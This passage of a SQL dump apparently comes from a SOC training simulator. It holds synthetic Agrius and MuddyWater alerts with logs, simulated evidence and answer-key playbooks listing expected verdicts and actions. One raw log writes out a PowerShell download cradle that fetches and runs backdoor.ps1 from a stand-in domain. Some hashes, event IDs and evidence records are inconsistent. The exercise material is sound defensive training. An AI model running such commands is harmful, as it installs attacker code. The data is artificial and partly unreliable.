'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.76.23.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with Agrius.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"update.js\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Script used for establishing persistence.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"SHA256 Lookup\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known Agrius malware variant.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"malicious_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Security Database\",\"verdict\":\"suspicious\",\"details\":\"User account potentially 
compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.824Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:20Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"action\\\":\\\"Scheduled Task Creation\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\update.js\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_modification\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousEntry\\\",\\\"source_ip\\\":\\\"45.76.23.89\\\",\\\"affected_host_ip\\\":\\\"192.168.1.102\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.824Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:20Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"action\\\":\\\"Scheduled Task Creation\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe 
C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\update.js\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_modification\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousEntry\\\",\\\"source_ip\\\":\\\"45.76.23.89\\\",\\\"affected_host_ip\\\":\\\"192.168.1.102\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.824Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:20Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"action\\\":\\\"Scheduled Task Creation\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\update.js\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_modification\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousEntry\\\",\\\"source_ip\\\":\\\"45.76.23.89\\\",\\\"affected_host_ip\\\":\\\"192.168.1.102\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.824Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:20Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"action\\\":\\\"Scheduled Task Creation\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe 
C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\update.js\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_modification\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousEntry\\\",\\\"source_ip\\\":\\\"45.76.23.89\\\",\\\"affected_host_ip\\\":\\\"192.168.1.102\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.824Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:20Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"action\\\":\\\"Scheduled Task Creation\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\update.js\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_modification\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousEntry\\\",\\\"source_ip\\\":\\\"45.76.23.89\\\",\\\"affected_host_ip\\\":\\\"192.168.1.102\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1333, 'Lateral Movement Pathway Identified', 'high', 'Network Traffic Analysis', 'The threat actor is leveraging harvested credentials to move laterally within the network, targeting additional systems to gain broader access and locate sensitive data.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"10.0.10.15\",\"destination_ip\":\"192.168.1.25\",\"external_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"auth_method\":\"NTLM\",\"file_accessed\":\"\\\\\\\\192.168.1.25\\\\sensitive_data\\\\financial_report.xlsx\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"event_type\":\"Successful Login\",\"protocol\":\"SMB\",\"malware_filename\":\"mimikatz.exe\"}', '2026-03-01 22:56:26', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.10.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted system.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with threat actor.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Filename commonly used by credential-stealing 
malware.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Employee username with compromised credentials.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1334, 'Data Exfiltration via Encrypted Channels', 'high', 'Data Loss Prevention (DLP)', 'Agrius APT group attempts to exfiltrate sensitive corporate data using encrypted channels, exploiting weaknesses in network monitoring to avoid detection.', 'Exfiltration', 'T1048.003 - Exfiltration Over Alternative Protocol: Encrypted Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:52:31Z\",\"event_id\":\"DLP-EXFIL-20231012-0005\",\"source_ip\":\"192.168.15.8\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"protocol\":\"HTTPS\",\"file_name\":\"company_secrets.zip\",\"file_hash\":\"f2ca1bb6c7e907d06dafe4687e579fce\",\"file_size\":\"10MB\",\"encryption\":\"AES-256\",\"action\":\"allowed\",\"alert_level\":\"high\",\"description\":\"An encrypted data transfer was detected from an internal host to an external IP associated with Agrius APT activities.\"}', '2026-03-01 22:56:26', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.15.8\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with Agrius APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2ca1bb6c7e907d06dafe4687e579fce\",\"is_critical\":true,\"osint_result\":{\"source\":\"antivirus database\",\"verdict\":\"suspicious\",\"details\":\"File hash detected in recent APT campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"company_secrets.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"suspicious\",\"details\":\"Sensitive data file potentially 
exfiltrated.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.827Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:52:31Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231012-0005\\\",\\\"source_ip\\\":\\\"192.168.15.8\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"company_secrets.zip\\\",\\\"file_hash\\\":\\\"f2ca1bb6c7e907d06dafe4687e579fce\\\",\\\"file_size\\\":\\\"10MB\\\",\\\"encryption\\\":\\\"AES-256\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert_level\\\":\\\"high\\\",\\\"description\\\":\\\"An encrypted data transfer was detected from an internal host to an external IP associated with Agrius APT activities.\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.827Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:52:31Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231012-0005\\\",\\\"source_ip\\\":\\\"192.168.15.8\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"company_secrets.zip\\\",\\\"file_hash\\\":\\\"f2ca1bb6c7e907d06dafe4687e579fce\\\",\\\"file_size\\\":\\\"10MB\\\",\\\"encryption\\\":\\\"AES-256\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert_level\\\":\\\"high\\\",\\\"description\\\":\\\"An encrypted data transfer was detected from an internal host to an external IP associated with Agrius APT 
activities.\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.827Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:52:31Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231012-0005\\\",\\\"source_ip\\\":\\\"192.168.15.8\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"company_secrets.zip\\\",\\\"file_hash\\\":\\\"f2ca1bb6c7e907d06dafe4687e579fce\\\",\\\"file_size\\\":\\\"10MB\\\",\\\"encryption\\\":\\\"AES-256\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert_level\\\":\\\"high\\\",\\\"description\\\":\\\"An encrypted data transfer was detected from an internal host to an external IP associated with Agrius APT activities.\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.827Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:52:31Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231012-0005\\\",\\\"source_ip\\\":\\\"192.168.15.8\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"company_secrets.zip\\\",\\\"file_hash\\\":\\\"f2ca1bb6c7e907d06dafe4687e579fce\\\",\\\"file_size\\\":\\\"10MB\\\",\\\"encryption\\\":\\\"AES-256\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert_level\\\":\\\"high\\\",\\\"description\\\":\\\"An encrypted data transfer was detected from an internal host to an external IP associated with Agrius APT activities.\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.827Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:52:31Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231012-0005\\\",\\\"source_ip\\\":\\\"192.168.15.8\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"company_secrets.zip\\\",\\\"file_hash\\\":\\\"f2ca1bb6c7e907d06dafe4687e579fce\\\",\\\"file_size\\\":\\\"10MB\\\",\\\"encryption\\\":\\\"AES-256\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert_level\\\":\\\"high\\\",\\\"description\\\":\\\"An encrypted data transfer was detected from an internal host to an external IP associated with Agrius APT activities.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1335, 'Suspicious Phishing Email Detected', 'high', 'Email Gateway Logs', 'A phishing email was detected aimed at gaining an initial foothold into the telecommunications network. The email contains a malicious attachment believed to be associated with the MuddyWater APT group.', 'Initial Access', 'T1566.001 - Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:00Z\",\"email_id\":\"1234567890abcdef\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.1.5\",\"sender_email\":\"attacker@maliciousdomain.com\",\"recipient_email\":\"victim@telecomnetwork.com\",\"subject\":\"Urgent: Invoice Attached\",\"attachment\":{\"filename\":\"invoice_details.docm\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"},\"detected_malware\":\"MuddyWater\",\"action_taken\":\"Email quarantined\"}', '2026-03-01 22:56:56', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Email associated with phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known MuddyWater malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Phishing Email Detected\",\"date\":\"2026-03-02T13:55:06.828Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1336, 'Execution of Malicious PowerShell Script', 'high', 'Endpoint Detection and Response (EDR) Systems', 'A PowerShell script was executed on the host system to download and run a backdoor, associated with the MuddyWater APT group. This script execution is part of a post-compromise activity aimed at maintaining persistence and enabling further malicious actions within the network.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:56:23Z\",\"event_id\":\"4624\",\"computer_name\":\"DESKTOP-8D7KJH5\",\"user\":\"jdoe\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\script.ps1\",\"script_content\":\"IEX (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/backdoor.ps1\')\",\"internal_ip\":\"10.0.0.15\",\"external_ip\":\"203.0.113.45\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"script.ps1\"}', '2026-03-01 22:56:56', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with MuddyWater APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash associated with suspicious PowerShell scripts.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"Domain linked to malware 
distribution.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in PowerShell attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account used to execute the script.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1337, 'Establishment of Persistent Backdoor', 'high', 'System Logs', 'MuddyWater has leveraged its custom C2 framework to install a persistent backdoor, ensuring long-term access. The backdoor was deployed using a malicious script that altered system configurations for persistence.', 'Persistence', 'TA0003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:44Z\",\"event_type\":\"system_modification\",\"system_user\":\"svc_backup\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\backdoor.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"registry_change\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\backdoor\",\"action\":\"create_persistence\"}', '2026-03-01 22:56:56', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 IP associated with MuddyWater operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Compromised internal host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with MuddyWater backdoor variant.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File System Analysis\",\"verdict\":\"malicious\",\"details\":\"File identified as a persistent backdoor.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"svc_backup\",\"is_critical\":false,\"osint_result\":{\"source\":\"User Account 
Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Service account used in unauthorized activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.831Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:44Z\\\",\\\"event_type\\\":\\\"system_modification\\\",\\\"system_user\\\":\\\"svc_backup\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\etc\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_change\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\backdoor\\\",\\\"action\\\":\\\"create_persistence\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.831Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:44Z\\\",\\\"event_type\\\":\\\"system_modification\\\",\\\"system_user\\\":\\\"svc_backup\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\etc\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_change\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\backdoor\\\",\\\"action\\\":\\\"create_persistence\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.831Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 